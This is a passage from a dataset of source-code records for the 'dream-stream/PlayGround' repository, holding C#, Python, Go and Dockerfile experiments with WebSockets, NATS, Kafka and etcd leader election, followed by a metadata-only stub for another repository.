System.Threading.Tasks;\nusing Dream_Stream.Models.Messages;\nusing MessagePack;\nusing Microsoft.AspNetCore.Http;\nusing Prometheus;\n\nnamespace Dream_Stream.Services\n{\n public class MessageHandler\n {\n private static readonly Counter Counter = Metrics.CreateCounter(\"Messages_Received\", \"\");\n\n public async Task Handle(HttpContext context, WebSocket webSocket)\n {\n var buffer = new byte[1024 * 4];\n WebSocketReceiveResult result = null;\n Console.WriteLine($\"Handling message from: {context.Connection.RemoteIpAddress}\");\n try\n {\n do\n {\n result = await webSocket.ReceiveAsync(new ArraySegment<byte>(buffer), CancellationToken.None);\n if (result.CloseStatus.HasValue) break;\n\n var message =\n LZ4MessagePackSerializer.Deserialize<IMessage>(buffer.Take(result.Count).ToArray());\n\n switch (message)\n {\n case MessageContainer msg:\n await HandlePublishMessage(msg);\n Counter.Inc();\n break;\n case SubscriptionRequest msg:\n await HandleSubscriptionRequest(msg, webSocket);\n break;\n case MessageRequest msg:\n await HandleMessageRequest(msg, webSocket);\n break;\n }\n \n \n } while (!result.CloseStatus.HasValue);\n }\n catch (Exception e)\n {\n Console.WriteLine(e);\n }\n finally\n {\n await webSocket.CloseAsync(WebSocketCloseStatus.NormalClosure, result?.CloseStatusDescription ?? \"Failed hard\", CancellationToken.None);\n }\n }\n\n private static async Task HandleMessageRequest(MessageRequest msg, WebSocket webSocket)\n {\n //TODO Handle MessageRequest correctly\n var buffer = LZ4MessagePackSerializer.Serialize<IMessage>(new MessageContainer\n {\n Header = new MessageHeader {Topic = \"SensorData\", Partition = 3},\n Messages = new List<Message> { new Message {Address = \"Address\", LocationDescription = \"Description\", SensorType = \"Sensor\", Measurement = 20, Unit = \"Unit\"}}\n });\n await webSocket.SendAsync(new ArraySegment<byte>(buffer), WebSocketMessageType.Binary, false,\n CancellationToken.None);\n }\n\n private static async Task HandleSubscriptionRequest(SubscriptionRequest message, WebSocket webSocket)\n {\n //TODO Handle SubRequest correctly\n Console.WriteLine($\"Consumer subscribed to: {message.Topic}\");\n var buffer = LZ4MessagePackSerializer.Serialize<IMessage>(new SubscriptionResponse {TestMessage = $\"You did it! You subscribed to {message.Topic}\"});\n await webSocket.SendAsync(new ArraySegment<byte>(buffer), WebSocketMessageType.Binary, false,\n CancellationToken.None);\n }\n\n private static async Task HandlePublishMessage(MessageContainer messages)\n {\n //TODO Store the message\n //TODO Respond to publisher that the message is received correctly\n messages.Print();\n await Task.Run(() => Task.CompletedTask);\n }\n }\n}\n" }, { "alpha_fraction": 0.6218568682670593, "alphanum_fraction": 0.6286267042160034, "avg_line_length": 26.236841201782227, "blob_id": "0646513745328a2c5bcbc73b0f3e9fea66c1a8a9", "content_id": "dab28e2c06dc056350311d96876972db429e3e0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1034, "license_type": "no_license", "max_line_length": 73, "num_lines": 38, "path": "/Nats/Python/Consumer.py", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "import asyncio\nimport msvcrt\nfrom nats.aio.client import Client as NATS\n\nasync def run(loop):\n nc = NATS()\n\n await nc.connect(\"localhost:4222\", loop=loop)\n\n async def message_handler(msg):\n subject = msg.subject\n reply = msg.reply\n data = msg.data.decode()\n print(\"Received a message on '{subject} {reply}': {data}\".format(\n subject=subject, reply=reply, data=data))\n\n # Simple publisher and async subscriber via coroutine.\n sid = await nc.subscribe(\"foo\", cb=message_handler)\n\n print(\"The consumer is ready to receive messages\")\n print(\"Press enter to close the application\")\n\n while True:\n await asyncio.sleep(1, loop=loop)\n if msvcrt.kbhit():\n if ord(msvcrt.getch()) == 13:\n break\n\n # Remove interest in subscription.\n await nc.unsubscribe(sid)\n\n # Terminate connection to NATS.\n await nc.close()\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(run(loop))\n loop.close()" }, { "alpha_fraction": 0.7136842012405396, "alphanum_fraction": 0.7284210324287415, "avg_line_length": 24.052631378173828, "blob_id": "c3206a3fd2ac690800851c3e58980b7f0e238baf", "content_id": "0626f707c6f9b388dd56040f784fae4ebad27e80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 475, "license_type": "no_license", "max_line_length": 56, "num_lines": 19, "path": "/Kafka/Go/Publisher/Dockerfile", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "FROM golang:1.12.9-alpine3.10 AS base\nRUN apk add build-base bash git\nRUN git clone https://github.com/edenhill/librdkafka.git\nWORKDIR librdkafka\nRUN ./configure --prefix /usr && make && make install\nRUN apk del build-base bash git\nRUN rm -r /go/librdkafka\n\nFROM base AS builder\nRUN apk add git pkgconf build-base\nWORKDIR /go/src/app\nCOPY . .\nRUN go get -d -v ./...\nRUN go build -o app\n\nFROM base\nWORKDIR /go/src/app\nCOPY --from=builder /go/src/app/app .\nENTRYPOINT [\"./app\"]" }, { "alpha_fraction": 0.5118373036384583, "alphanum_fraction": 0.5201733708381653, "avg_line_length": 34.71428680419922, "blob_id": "de65e6afd05bf87dd26c6c464f2e9d8fcc390f68", "content_id": "bd4fbfc16029f28ca2698a7d305a1f930fa66a1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 3001, "license_type": "no_license", "max_line_length": 122, "num_lines": 84, "path": "/NatsStreaming/dotnet/Producer/Producer/Program.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Diagnostics;\nusing System.Text;\nusing System.Threading;\nusing STAN.Client;\n\nnamespace Producer\n{\n internal class StanPublisher\n {\n private readonly StanOptions _cOpts = StanOptions.GetDefaultOptions();\n\n private const int Count = 10000;\n private string _clientId = \"cs-publisher\";\n private const string ClusterId = \"nats-streaming\";\n private readonly byte[] _payload = Encoding.UTF8.GetBytes(\"hello\");\n private const string Subject = \"foo\";\n private const string Url = \"nats://nats-cluster:4222\";\n private const bool Verbose = false;\n\n private void Run(string[] args)\n {\n _clientId += Guid.NewGuid();\n\n Banner();\n\n _cOpts.NatsURL = Url;\n using var c = new StanConnectionFactory().CreateConnection(ClusterId, _clientId, _cOpts);\n while (true)\n {\n long acksProcessed = 0;\n var sw = Stopwatch.StartNew();\n var ev = new AutoResetEvent(false);\n\n // async\n for (var i = 0; i < Count; i++)\n {\n var guid = c.Publish(Subject, _payload, (obj, pubArgs) =>\n {\n if (Verbose) Console.WriteLine(\"Received ack for message {0}\", pubArgs.GUID);\n if (!string.IsNullOrEmpty(pubArgs.Error))\n Console.WriteLine(\"Error processing message {0}\", pubArgs.GUID);\n\n if (Interlocked.Increment(ref acksProcessed) == Count)\n ev.Set();\n });\n\n if (Verbose)\n Console.WriteLine(\"Published message with guid: {0}\", guid);\n }\n\n ev.WaitOne();\n sw.Stop();\n\n Console.Write(\"Published {0} msgs with acknowledgements in {1} seconds \", Count, sw.Elapsed.TotalSeconds);\n Console.WriteLine(\"({0} msgs/second).\", (int)(Count / sw.Elapsed.TotalSeconds));\n }\n }\n\n private void Banner()\n {\n Console.WriteLine(\"Connecting to cluster '{0}' as client '{1}'.\", ClusterId, _clientId);\n Console.WriteLine(\"Publishing {0} messages on subject {1}\", Count, Subject);\n Console.WriteLine(\" Url: {0}\", Url); \n Console.WriteLine(\" Payload is {0} bytes.\", _payload?.Length ?? 0);\n Console.WriteLine(\" Publish Mode is Asynchronous\" );\n }\n\n public static void Main(string[] args)\n {\n try\n {\n new StanPublisher().Run(args);\n }\n catch (Exception ex)\n {\n Console.Error.WriteLine(\"Exception: \" + ex.Message);\n if (ex.InnerException != null)\n Console.Error.WriteLine(\"Inner Exception: \" + ex.InnerException.Message);\n }\n }\n }\n}" }, { "alpha_fraction": 0.5408970713615417, "alphanum_fraction": 0.5514512062072754, "avg_line_length": 21.352941513061523, "blob_id": "71d268d55ebbd5e6e0315fb8a85414e78b126f4d", "content_id": "5827dfd91af252c1e7078577de51b51d825b2fff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 381, "license_type": "no_license", "max_line_length": 42, "num_lines": 17, "path": "/Deprecated Dream-Stream/Dream-Stream/Models/Messages/MessageRequest.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using MessagePack;\n\nnamespace Dream_Stream.Models.Messages\n{\n [MessagePackObject]\n public class MessageRequest : IMessage\n {\n [Key(1)]\n public string Topic { get; set; }\n [Key(2)]\n public int Partition { get; set; }\n [Key(3)]\n public ulong OffSet { get; set; }\n [Key(4)]\n public int ReadSize { get; set; }\n }\n}" }, { "alpha_fraction": 0.47316062450408936, "alphanum_fraction": 0.4806217551231384, "avg_line_length": 29.929487228393555, "blob_id": "007f6464fd228d93c7bb94f026a8b8fe62fc4580", "content_id": "aa3d94528b78db77f44082361d17a1e86ac6db20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 4827, "license_type": "no_license", "max_line_length": 130, "num_lines": 156, "path": "/Etcd/EtcdTester/EtcdTester/Program.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using System;\nusing System.Linq;\nusing System.Threading;\nusing System.Threading.Tasks;\nusing dotnet_etcd;\nusing Etcdserverpb;\nusing Mvccpb;\n\nnamespace EtcdTester\n{\n internal class Program\n {\n private const int LeaseTtl = 1;\n private const string LeaderKey = \"leader/topic1\";\n\n public static async Task Main(string[] args)\n {\n var me = Guid.NewGuid().ToString();\n Console.WriteLine(\"Hello World!\");\n\n var client = new EtcdClient(\"http://localhost\");\n await WatchExample(client);\n //await LeaderElectionExample(client, me);\n\n client.Dispose();\n }\n\n // Inspiration for the leader election have been found here: https://www.sandtable.com/etcd3-leader-election-using-python/\n private static async Task LeaderElectionExample(EtcdClient client, string me)\n {\n client.Watch(LeaderKey, SetNewElection);\n while (true)\n {\n NewElection = false;\n var (leader, lease) = await LeaderElection(client, me);\n if (leader)\n {\n Console.WriteLine(\"I'm the leader!!!\");\n var count = 0;\n while (count < 20)\n {\n count++;\n client.LeaseKeepAlive(new LeaseKeepAliveRequest { ID = lease.ID }, Print, CancellationToken.None);\n Thread.Sleep(500);\n }\n\n Console.WriteLine(\"I'm no longer the leader\");\n Thread.Sleep(10000);\n }\n else\n {\n Console.WriteLine(\"I'm a follower!!!\");\n while (!NewElection)\n {\n Thread.Sleep(500);\n }\n }\n }\n }\n\n private static void SetNewElection(WatchResponse watchResponse)\n {\n if(watchResponse.Events.Any(eventS => eventS.Type == Event.Types.EventType.Delete)) NewElection = true;\n }\n\n public static bool NewElection { get; set; }\n\n private static async Task<(bool, LeaseGrantResponse lease)> LeaderElection(EtcdClient client, string me)\n {\n bool result;\n var lease = client.LeaseGrant(new LeaseGrantRequest{TTL = LeaseTtl});\n\n try\n {\n result = await AddLeader(client, LeaderKey, me, lease);\n }\n catch (Exception e)\n {\n Console.WriteLine(e);\n return (false, lease);\n }\n\n return (result, lease);\n }\n\n private static async Task<bool> AddLeader(EtcdClient client, string key, string value, LeaseGrantResponse lease)\n {\n var protoKey = Google.Protobuf.ByteString.CopyFromUtf8(key);\n var transactionAsync = await client.TransactionAsync(new TxnRequest\n {\n Compare =\n {\n new Compare{Key = protoKey, Version = 0}\n },\n Success =\n {\n new RequestOp\n {\n RequestPut = new PutRequest\n {\n Key = protoKey,\n Value = Google.Protobuf.ByteString.CopyFromUtf8(value),\n Lease = lease.ID\n }\n }\n },\n Failure = { }\n });\n return transactionAsync.Succeeded;\n }\n\n\n\n\n\n\n\n\n private static async Task WatchExample(EtcdClient client)\n {\n //var count = 0;\n client.WatchRange(\"TopicList/\", Print);\n client.WatchRange(\"Broker/\", Print);\n client.WatchRange(\"Leader/\", Print);\n while (true)\n {\n //count++;\n\n //if (count % 10 == 0) await client.PutAsync(\"topic1/partition1\", $\"pod{count}\");\n //if (count % 3 == 0) await client.PutAsync(\"topic1/partition2\", $\"pod{count}\");\n\n Thread.Sleep(500);\n }\n }\n\n private static void Print(WatchResponse response)\n {\n if (response.Events.Count == 0)\n {\n Console.WriteLine(response);\n }\n else\n {\n foreach (var responseEvent in response.Events)\n {\n Console.WriteLine($\"{responseEvent.Kv.Key.ToStringUtf8()}:{responseEvent.Kv.Value.ToStringUtf8()}\");\n }\n }\n }\n\n private static void Print(LeaseKeepAliveResponse response)\n {\n //Console.WriteLine(response);\n }\n }\n}\n" }, { "alpha_fraction": 0.5592105388641357, "alphanum_fraction": 0.7598684430122375, "avg_line_length": 26.636363983154297, "blob_id": "943d01da473b0f1e0541e37d9d789544a2374889", "content_id": "82c6d2a8386ed686e2e2f66f44f7a28f34312aa2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go Module", "length_bytes": 304, "license_type": "no_license", "max_line_length": 64, "num_lines": 11, "path": "/Nats/Go/go.mod", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "module NatsInGo\n\ngo 1.12\n\nrequire (\n\tgithub.com/eiannone/keyboard v0.0.0-20190314115158-7169d0afeb4f\n\tgithub.com/golang/protobuf v1.3.2 // indirect\n\tgithub.com/nats-io/nats-server/v2 v2.0.4 // indirect\n\tgithub.com/nats-io/nats.go v1.8.1\n\tgolang.org/x/sys v0.0.0-20190826190057-c7b8b68b1456 // indirect\n)\n" }, { "alpha_fraction": 0.557692289352417, "alphanum_fraction": 0.7628205418586731, "avg_line_length": 18.5, "blob_id": "843ec343c09ef3280803b00aa4b51777e897ad07", "content_id": "b134ad3d53fa39c1f026ee1cf7e714349e0465b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go Module", "length_bytes": 156, "license_type": "no_license", "max_line_length": 64, "num_lines": 8, "path": "/Kafka/Go/go.mod", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "module KafkaInGo\n\ngo 1.12\n\nrequire (\n\tgolang.org/x/sys v0.0.0-20190826190057-c7b8b68b1456 // indirect\n\tgopkg.in/confluentinc/confluent-kafka-go.v1 v1.1.0\n)\n" } ]
19
schinckel/Auto-Models
https://github.com/schinckel/Auto-Models
8a67dc6007d3ad18a63a491717cb77e315c6199e
080a09202d64211253833677fcd19c58a0b69ac4
5c39f702197d6364de171f4f44f92ec9b4251f45
refs/heads/master
2020-12-25T00:39:21.405865
2010-02-14T15:35:35
2010-02-14T15:35:35
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6565139293670654, "alphanum_fraction": 0.6682876944541931, "avg_line_length": 31.28099250793457, "blob_id": "33117c6ae2a39b5212a1683ed594beb7d3fdb67d", "content_id": "7f6c958fc07551d708e8ad1b1f55e90e88df9415", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3907, "license_type": "no_license", "max_line_length": 109, "num_lines": 121, "path": "/README.markdown", "repo_name": "schinckel/Auto-Models", "src_encoding": "UTF-8", "text": "\n## OVERVIEW\n\n### Turns the following code:\n \n class TestType(models.Model):\n OS_TYPES_LIST = [\"Windows\", \"Mac\", \"Ubuntu\"]\n os_types_max_len, OS_TYPES, OS_TYPES_CHOICES = model_utils.convert_to_choices(OS_TYPES_LIST)\n \n OS_VERSION_LIST = [\"7\", \"XP\", \"Vista\", \"X.4\", \"X.5\", \"X.6\", \"8.04\", \"9.06\"]\n os_version_max_len, OS_VERSION, OS_VERSION_CHOICES = model_utils.convert_to_choices(OS_VERSION_LIST)\n \n FF_VERSION_LIST = [\"3.0\", \"3.5\", \"3.6\"]\n ff_max_len, FF_VERSION, FF_VERSION_CHOICES = model_utils.convert_to_choices(FF_VERSION_LIST)\n \n slug = models.CharField(max_length=200)\n name = models.CharField(max_length=200)\n os_type = models.CharField(max_length=os_types_max_len, choices=OS_TYPES_CHOICES)\n os_version = models.CharField(max_length=os_version_max_len, choices=OS_VERSION_CHOICES)\n ff_version = models.CharField(max_length=ff_max_len, choices=FF_VERSION_CHOICES)\n \n ...\n \n class TestRun(models.Model):\n test_type = models.ForeignKey(TestType)\n dtime = models.DateTimeField(db_index=True)\n is_pass = models.BooleanField(default=False)\n number_fail = models.IntegerField(default=-1)\n total = models.IntegerField(default=-1)\n duration = models.IntegerField(default=-1)\n \n ...\n \n### into an OmniGraffle diagram that looks like this:\n\n<img src=\"http://github.com/diN0bot/Auto-Models/raw/master/screenshot.png\" width=\"35%\" />\n\n### Turns the above OmniGraffle diagram into the following Django code:\n\n class TestType(models.Model):\n id = models.AutoField()\n slug = models.CharField(max_length=200)\n name = models.CharField(max_length=200)\n os_type = models.CharField(max_length=200)\n os_version = models.CharField(max_length=200)\n ff_version = models.CharField(max_length=200)\n\n class TestRun(models.Model):\n id = models.AutoField()\n test_type = models.ForeignKey('TestType')\n dtime = models.DateTimeField()\n is_pass = models.BooleanField()\n number_fail = models.IntegerField()\n total = models.IntegerField()\n duration = models.IntegerField()\n\n\n### Coming soon: keep existing diagrams and code in synch.\n\n## STATUS\n\n[x] Create OmniGraffle diagram from Django models code\n\n[ ] Update OmniGraffle diagram from Django models code\n\n[X] Create Django models code from OmniGraffle diagram\n\n[ ] Update Django models code from OmbniGraffle diagram\n\n## DEPENDENCIES\n\nOmniGraffle\n\n* [http://www.omnigroup.com/applications/omnigraffle/](http://www.omnigroup.com/applications/omnigraffle/)\n* Mac-only software\n* requires OmniGraffle\n* requires appscript, python library for AppleScript\n* [http://appscript.sourceforge.net/py-appscript/doc/](http://appscript.sourceforge.net/py-appscript/doc/)\n\n sudo easy_install appscript\n\nDjango\n\n* [http://djangoproject.com](http://djangoproject.com)\n\n## RUN\n\nFrom command line:\n\n cd <Django project (or some directory inside project)>\n python main.py <django app name>,<django app2 name>,...\n \nFor example, to create a diagram for the models in apps foo\nand bar, run like so:\n\n python main.py foo,bar\n \nThe script does a force-directed layout on the models. This will\nlikely need to be tweaked, both through the \"Canvas: Diagram Layout\"\ninspector (apple-4) and by hand.\n\n## TODO\n\n[x] Add fields to diagram nodes\n\n[x] First pass automatic layout\n\n[ ] Be lenient in what is accepted when loading OmniGraffle files (to \n permit users to alter, add notes)\n \n[ ] More robust, clean errors all over\n\nIf requested:\n\n[ ] Remove diN0-specific Django dependencies so people (without sweet\nDjango setups) can use this off the shelf\n\n[ ] Nice GUI or command-line interface\n\n[ ] other diagram formats\n\n[ ] other code formats\n" }, { "alpha_fraction": 0.6461843252182007, "alphanum_fraction": 0.6565907001495361, "avg_line_length": 29.984615325927734, "blob_id": "e656e747d9592b4a0670800a02b9261ac25bc3a5", "content_id": "56b565b16a59a895316b8a21a3425d7b16be1b6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2018, "license_type": "no_license", "max_line_length": 91, "num_lines": 65, "path": "/main.py", "repo_name": "schinckel/Auto-Models", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nReads Django models and creates new OmniGraffle file\n\nRun this script:\n cd <somewhere in Django project>\n python <absolute path>/main.py\n\"\"\"\n\n\nfrom django_interface import DjangoModelInterface, _find_file_in_ancestors\nfrom omni_interface import OmniGraffleInterface\n\nimport sys\n\nif __name__ == \"__main__\":\n \"\"\"\n test script:\n 1. loads Django models\n 2. writes OmniGraffle file based on models\n 3. reads back OmniGraffle file\n 4. prints Django classes\n \"\"\"\n \n if len(sys.argv) > 1:\n apps = sys.argv[1].split(',')\n else:\n try:\n # settings.APPS is a neat Django trick:\n # http://proudly.procrasdonate.com/django-tricks-part-5-automatic-app-settings/\n settings_dir = _find_file_in_ancestors(\"settings.py\")\n sys.path.append(settings_dir)\n \n from django.core.management import setup_environ\n import settings\n setup_environ(settings)\n apps = settings.APPS\n except:\n print \"\"\"\nPlease provide comma-separated list of Django apps:\n python <path>/main.py foo,bar,baz\n \n\"\"\"\n exit(1)\n \n aobjects = DjangoModelInterface.load_aobjects(apps)\n print \"\\nSuccessfully loaded Django models into internal format\"\n #DjangoModelInterface.pretty_print(aobjects)\n \n ogi = OmniGraffleInterface()\n ogi.create_graffle(aobjects)\n print \"\\nSuccessfully created OmniGraffle diagram from internal format\"\n \n #print '-'*20, \"expected models\", '-'*20\n #expected_code = DjangoModelInterface.create_classes(aobjects)\n #DjangoModelInterface.print_classes(aobjects)\n #print '-'*60\n \n aobjects2 = ogi.load_aobjects()\n print \"\\nSuccessfully loaded OmniGraffle back into internal format\"\n print \"\\nWriting Django code from format:\\n\"\n DjangoModelInterface.print_classes(aobjects2)\n #print '-'*20, \"actual models\", '-'*20\n #actual_code = DjangoModelInterface.create_classes(aobjects2)\n " }, { "alpha_fraction": 0.5474950075149536, "alphanum_fraction": 0.5488978028297424, "avg_line_length": 32.716217041015625, "blob_id": "de20c98269318d31427473f2d31d35027bd1009b", "content_id": "8c76c279aec7a094fa80f684bf880db2b1d3f35e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4990, "license_type": "no_license", "max_line_length": 88, "num_lines": 148, "path": "/django_interface.py", "repo_name": "schinckel/Auto-Models", "src_encoding": "UTF-8", "text": "\nfrom data_structures import *\n\nimport sys\n\nclass DjangoModelInterface(object):\n \"\"\"\n Abstracts Django specific parsing and editing.\n \"\"\"\n \n def __init__(self):\n raise \"Nothing worth instantiating\"\n \n @classmethod\n def load_aobjects(klass, apps=None):\n \"\"\"\n Loads models from apps into AObjects\n \n note: Must be run from within Django project.\n note: In order for all relation edges to be shown,\n all referenced apps should be included.\n \n @param apps: list of app names, eg ['foo', 'bar']\n @return: list of AObjects\n \"\"\"\n apps = apps or []\n # All AObjects created from models in apps\n # model class object -> AObject\n obj_dict = {}\n setup_django_environment()\n \"\"\"\n Load models into internal data structures\n 1. First pass collects models as AObjects\n 2. Second pass sets fields, including ForeignKeys to AObjects\n \"\"\"\n klass._model_iterator(obj_dict, apps, klass._first_pass)\n klass._model_iterator(obj_dict, apps, klass._second_pass)\n \n return obj_dict.values()\n\n @classmethod\n def _first_pass(klass, obj_dict, model):\n \"\"\" First pass collects models as AObjects \"\"\"\n # create AObject for model class\n o = AObject(model.__name__)\n obj_dict[model] = o\n \n @classmethod\n def _second_pass(klass, obj_dict, model):\n \"\"\" Second pass sets fields, including ForeignKeys to AObjects \"\"\"\n # retrieve AObject for model class\n o = obj_dict[model]\n\n # iterate over model's fields to add AFields\n for field in model._meta.fields:\n f = AField(field.name, field.get_internal_type())\n if field.rel:\n if field.rel.to in obj_dict:\n f.set_destination(obj_dict[field.rel.to])\n o.add_field(field=f)\n \n @classmethod\n def _model_iterator(klass, obj_dict, apps, fn):\n \"\"\"\n @param fn: function that takes 2 parameters:\n klass (DjangoModelInterface instance)\n model (class object)\n \"\"\"\n for app in apps:\n app = __import__(app)\n # PD_SPECIFIC: use of ALL_MODELS, list of class names\n for model in app.models.ALL_MODELS:\n # retrieve class object for class name\n #model = getattr(app.models, model)\n fn(obj_dict, model)\n \n @classmethod\n def print_classes(klass, aobjects, filename=None):\n \"\"\"\n Convenience function for printing create_classes \n \"\"\"\n lines = klass.create_classes(aobjects, filename)\n if filename:\n f = open(filename)\n f.write(\"\\n\".join(lines))\n f.close()\n else:\n print \"\\n\".join(lines)\n \n @classmethod\n def create_classes(klass, aobjects, filename=None):\n \"\"\"\n @return: list of strings representing lines of code\n \"\"\"\n lines = []\n for aobject in aobjects:\n lines.append(\"class %s(models.Model):\" % aobject.name)\n for field in aobject.fields:\n p = []\n if field.dest:\n p.append(\"'%s'\" % field.dest.name)\n if field.type == 'CharField':\n p.append(\"max_length=200\")\n lines.append(\" %s = models.%s(%s)\" % (field.name,\n field.type,\n \", \".join(p)))\n lines.append(\"\")\n \n # ToDo: print __unicode__ and Make methods, also class docs (OG notes?)\n # more default fields? what to express in omni graffle, visually v notes\n return lines\n\n @classmethod\n def pretty_print(klass, aobjects):\n for m in aobjects:\n print m.name\n for f in m.fields:\n print \" \", f.name, f.type\n if f.dest:\n print \" \", f.dest.name\n\n\n####### DJANGO UTILTIES #######\n\ndef setup_django_environment():\n \"\"\" Setup Django environment \"\"\"\n # Nearest ancestor directory with a 'settings.py' file\n settings_dir = _find_file_in_ancestors(\"settings.py\")\n sys.path.append(settings_dir)\n \n from django.core.management import setup_environ\n import settings\n setup_environ(settings)\n\ndef _find_file_in_ancestors(filename):\n \"\"\"\n For each parent directory, check if 'filename' exists. If found, return\n the path; otherwise raise RuntimeError.\n \"\"\"\n import os\n path = os.path.realpath(os.path.curdir)\n while not filename in os.listdir(path):\n #if filename in os.listdir(path):\n # return path\n newpath = os.path.split(path)[0]\n if path == newpath:\n raise RuntimeError(\"No file '%s' found in ancestor directories.\" % filename)\n path = newpath\n return path" } ]
3
Shamp8/Homework_python
https://github.com/Shamp8/Homework_python
339da5e3fb605571b2aebb78e3efa91b165c32ad
e03fe6f378b5f9c1ec510e5eb1adef8ec7009ca5
3349b7e0cbaa5e18ee7f46ea7cbab57c94804532
refs/heads/1
2023-07-04T12:58:20.935999
2021-07-25T17:16:33
2021-07-25T17:16:33
389,400,104
0
0
null
2021-07-25T17:07:03
2021-07-25T17:34:13
2021-08-11T14:10:08
Python
[ { "alpha_fraction": 0.5227272510528564, "alphanum_fraction": 0.6439393758773804, "avg_line_length": 25, "blob_id": "702830e72b5149a325338c97050286024eabd4d5", "content_id": "23a55904ed5a68b1540ec8ea310384b12778a16b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 151, "license_type": "no_license", "max_line_length": 36, "num_lines": 5, "path": "/2.py", "repo_name": "Shamp8/Homework_python", "src_encoding": "UTF-8", "text": "time=int(input(\"Задайте секунды: \"))\nhour = time//3600\nmin = time%3600//60\nsec = time%3600%60\nprint(f\"время: {hour}:{min}:{sec}\")\n\n\n" }, { "alpha_fraction": 0.5980392098426819, "alphanum_fraction": 0.5980392098426819, "avg_line_length": 24.75, "blob_id": "2ad532e088bd93bf10d0e3716f8d6ad788b223a3", "content_id": "fcece15a5eb6071f981b5d2069712a0a9ad59510", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 118, "license_type": "no_license", "max_line_length": 35, "num_lines": 4, "path": "/1.py", "repo_name": "Shamp8/Homework_python", "src_encoding": "UTF-8", "text": "name = input(\"Ведите Ваше имя: \")\nage = input(\"Ведите Ваш возраст: \")\nprint(\"name = \",name)\nprint(\"age = \",age)" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 15, "blob_id": "12632b3fefca57601f68ba812fb94632983074fc", "content_id": "0ace858be66706f517316a6e75e66815ed78f1d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 95, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/3.py", "repo_name": "Shamp8/Homework_python", "src_encoding": "UTF-8", "text": "n = input('Задайте значение n: ')\na=n+n\nb=n+n+n\nc=int(a)+int(b)+int(n)\nprint(c)\n" }, { "alpha_fraction": 0.6580311059951782, "alphanum_fraction": 0.6787564754486084, "avg_line_length": 26.285715103149414, "blob_id": "d322f21ccc4f79bc30b3ee2353c4396b06654b6f", "content_id": "da814d3c9e89cb1d886505ac4db48e7c1a52337c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 283, "license_type": "no_license", "max_line_length": 56, "num_lines": 7, "path": "/6.py", "repo_name": "Shamp8/Homework_python", "src_encoding": "UTF-8", "text": "x=int(input(\"Введите дистанцию первой пробежки \"))\ny=int(input(\"Введите целевую дистанцию \"))\ni=1\nwhile x<=y:\n x=x+x*0.1\n i=i+1\nprint(\"Для достижения результата необходимо\", i, \"дней\")\n\n\n" }, { "alpha_fraction": 0.7078651785850525, "alphanum_fraction": 0.7078651785850525, "avg_line_length": 35.91666793823242, "blob_id": "3cdb96860333f4c741599a401d5fcd15b24be1f3", "content_id": "086fb2faee0bb029501581acd5be57bb25a6df5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 590, "license_type": "no_license", "max_line_length": 71, "num_lines": 12, "path": "/5.py", "repo_name": "Shamp8/Homework_python", "src_encoding": "UTF-8", "text": "revenues=int(input(\"Какая у Вас выручка? \"))\ncost=int(input(\"Какие издержки? \"))\nif revenues<cost:\n print(\"К сожалению, Вы в убытке\")\nelif revenues==cost:\n print(\"Вы работаете в ноль\")\nelse:\n profit=revenues/cost\n employees=int(input(\"Сколько у Вас работников? \"))\n profitonempoyee=revenues//employees\n print(\"Соотношение прибыли к выручке - \", profit)\n print(\"Прибыль на одного сотрудника составила - \", profitonempoyee)\n\n\n" } ]
5
Trietptm-on-Security/yara_scan
https://github.com/Trietptm-on-Security/yara_scan
656eb5de2c41a9c448276f552b46d8de7e57b820
067d7528a6e3e2447f0473df30ccab3c864624b6
0e4baf77073c04786d34792c3c4f8ec9a9c43e92
refs/heads/master
2017-05-26T03:13:41.278489
2016-07-25T22:20:13
2016-07-25T22:20:13
null
0
0
null
null
null
null
null
